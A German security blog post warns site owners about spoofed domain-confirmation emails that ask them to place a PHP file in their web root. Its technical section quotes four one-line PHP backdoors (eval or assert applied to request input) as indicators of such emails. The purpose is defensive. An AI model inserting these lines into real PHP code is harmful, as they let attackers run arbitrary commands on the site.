Vertrauen Sie keinen gefälschten Domain-Bestätigungs-E-Mails.
Sollten Sie jemals ein Schreiben jeglicher Art erhalten, in dem Sie aufgefordert werden, PHP-Code auf Ihrer Website zu erstellen, herunterzuladen oder zu installieren, müssen Sie dieses ignorieren.
English version: Do not trust those fake domain confirmation emails
Kürzlich erhielten einige meiner Mandanten merkwürdige E-Mails von ihren Domain-Registraren. Diese E-Mails enthielten die Aufforderung, die Domains der Mandanten zu bestätigen. Ich überprüfte eine dieser E-Mails und identifizierte sie schnell als Betrugsversuch . Alle E-Mails weisen das gleiche Muster auf und fordern dazu auf, im Stammverzeichnis einer Website eine PHP-Datei mit einem bestimmten Namen und vorgegebenem Inhalt zu erstellen. Der vorgeschlagene Inhalt dieser PHP-Datei enthält natürlich Schadcode, einen sogenannten Backdoor-Code. Dieser Code ermöglicht es Angreifern, beliebige Aktionen auf der Website des Opfers auszuführen.
Sollten Sie jemals einen Brief erhalten, in dem Sie aufgefordert werden, PHP-Code auf Ihrer Website zu erstellen, herunterzuladen oder zu installieren, ignorieren Sie ihn unbedingt. Ausnahmslos. Selbst wenn der Brief vom Präsidenten oder Ihrer Mutter stammt.
Betrügerische E-Mails wirken aufgrund einer scheinbar legitimen Absenderadresse authentisch. Es handelt sich jedoch um E-Mail-Spoofing. Sie erwarten ja auch keine gefälschte E-Mail von Freunden oder Ihrem Domain-Registrar, oder? Falsch! Jede E-Mail kann eine beliebige Absenderadresse haben. Die meisten E-Mail-Server und -Clients überprüfen die Absenderadresse nicht. Daher kann es sich verdächtig anfühlen, wenn Sie eine E-Mail von einem Hacker erhalten. Vertrauen Sie keiner E-Mail von einem bekannten Absender, wenn diese zu verdächtigen Aktionen auffordert, wie beispielsweise zur Installation von Code auf Ihrer Website oder einer Anwendung auf Ihrem Computer.
Technische Details
Gefälschte E-Mails enthalten üblicherweise einige der folgenden PHP-Zeilen.
assert(stripslashes($_REQUEST['something']));
eval(stripslashes($_REQUEST['something']));
assert(base64_decode($_REQUEST['something']));
eval(base64_decode($_REQUEST['something']));
Zur Information: base64_decode, eval und assert sind bekannte Indikatoren für verdächtigen oder bösartigen PHP-Code.
Siehe auch: Plugin-Inspektor deckt Sicherheitslücken bei anderen Plugins auf